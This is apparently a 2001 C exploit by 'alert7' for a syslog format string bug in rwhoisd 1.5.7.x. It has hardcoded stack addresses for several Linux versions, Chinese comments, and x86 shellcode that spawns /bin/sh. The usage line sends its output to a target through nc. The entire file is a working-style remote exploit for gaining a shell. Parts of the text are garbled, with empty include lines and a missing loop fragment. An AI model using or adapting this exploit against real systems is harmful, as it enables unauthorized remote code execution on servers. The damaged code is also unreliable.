/* *by alert7 for Rwhoisd syslog format string bug exploit demo *usage: (./e [localhost ip len];cat )|nc 127.0.0.1 4321 *2001-11-20 */ #include #include /*FORMATSTRING_ADDR > FORMATSTRING_ARGV的时候*/ struct version { char *name; int formatstring_addr; int formatstring_argv; int retloc; }; struct version version[] = { { "Linux x86 6.1 rwhoisd-1.5.7.1 src",0xbffff780,0xbffff56c,0xbffff3a4 } , { "Linux x86 6.2 rwhoisd-1.5.7.1 src",0xbffff5d0,0xbffff3bc,0xbffff1f4 } , { "Linux x86 7.1 rwhoisd-1.5.7.1 src",0xbffff490,0xbffff278,0xbffff05c } , { "Linux x86 6.2 rwhoisd-1.5.7.2 src",0xbffff64c,0xbffff438,0xbffff270 } , 0 }; char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x31\xdb\x31\xc9\x43\x41\x41\xb0\x3f\xcd\x80" "\xeb\x25\x5e\x89\xf3\x83\xc3\xe0\x89\x73\x28\x31\xc0\x88\x43\x27\x89\x43" "\x2c\x83\xe8\xf5\x8d\x4b\x28\x8d\x53\x2c\x89\xf3\xcd\x80\x31\xdb\x89\xd8" "\x40\xcd\x80\xe8\xd6\xff\xff\xff/bin/sh" ; int main(int argc, char *argv[]) { char *ptr; long shell_addr,retloc;//函数本身返回地址存放的地址 int i,SH1,SH2; int paging; int DEFAULT_ALIGNMENT;//对齐 int FORMATSTRING_ADDR; //format string地址 int FORMATSTRING_ARGV; //format string对应的参数的开始地址 char buf[1024]; int YOURIPLEN=9; //strlen("127.0.0.1") if (argc<2) { printf("usage:( %s [localhost ip len];cat)|nc target port\n \ravailable support:\n",argv[0]); for (i=0;version[i].name;i++) printf("(%d)\t%s\n",i,version[i].name); exit(-1); } if (argc==3) YOURIPLEN=atoi(argv[2]); FORMATSTRING_ADDR=version[atoi(argv[1])].formatstring_addr+YOURIPLEN+16; FORMATSTRING_ARGV=version[atoi(argv[1])].formatstring_argv; retloc= version[atoi(argv[1])].retloc; DEFAULT_ALIGNMENT=4-(FORMATSTRING_ADDR-FORMATSTRING_ARGV)%4; if (DEFAULT_ALIGNMENT==4) DEFAULT_ALIGNMENT=0; paging=FORMATSTRING_ADDR+DEFAULT_ALIGNMENT-FORMATSTRING_ARGV; //printf("Using RET location address: 0x%x\n", retloc); shell_addr = FORMATSTRING_ADDR+DEFAULT_ALIGNMENT+8*2+(paging/4)*2+20; //printf("Using Shellcode address: 0x%x\n", shell_addr); SH1 = (shell_addr >> 16) & 0xffff;//SH1=0xbfff SH2 = (shell_addr >> 0) & 0xffff;//SH2=0xd3a8 ptr = buf; for (i=0;i> 8 ) & 0xff ; (*ptr++) = ((retloc+2) >> 16 ) & 0xff ; (*ptr++) = ((retloc+2) >> 24 ) & 0xff ; memset(ptr,'B',4); ptr += 4 ; (*ptr++) = (retloc) & 0xff; (*ptr++) = ((retloc) >> 8 ) & 0xff ; (*ptr++) = ((retloc) >> 16 ) & 0xff ; (*ptr++) = ((retloc) >> 24 ) & 0xff ; for (i=0;i<(paging/4);i++) { (*ptr++) = '%'; (*ptr++) = 'c'; } sprintf(ptr,"%%%uc%%hn%%%uc%%hn",(SH1-8*2-(paging/4)-DEFAULT_ALIGNMENT-(16+YOURIPLEN)),(SH2-SH1 )); /*推荐构造格式化串的时候使用%hn*/ } if ((SH1 )>(SH2)) { memset(ptr,'B',4); ptr += 4 ; (*ptr++) = (retloc) & 0xff; (*ptr++) = ((retloc) >> 8 ) & 0xff ; (*ptr++) = ((retloc) >> 16 ) & 0xff ; (*ptr++) = ((retloc) >> 24 ) & 0xff ; memset(ptr,'B',4); ptr += 4 ; (*ptr++) = (retloc+2) & 0xff; (*ptr++) = ((retloc+2) >> 8 ) & 0xff ; (*ptr++) = ((retloc+2) >> 16 ) & 0xff ; (*ptr++) = ((retloc+2) >> 24 ) & 0xff ; for (i=0;i<(paging/4);i++) { (*ptr++) = '%'; (*ptr++) = 'c'; } sprintf(ptr,"%%%uc%%hn%%%uc%%hn",(SH2-8*2-(paging/4)-DEFAULT_ALIGNMENT-(16+YOURIPLEN)),(SH1-SH2 )); } if ((SH1 )==(SH2)) { printf("不会这么巧吧，今天可以去买彩票了:)\n"); exit(0); } //printf("-soa hi\n"); //sleep(30); printf("%s%s\n",buf,shellcode); }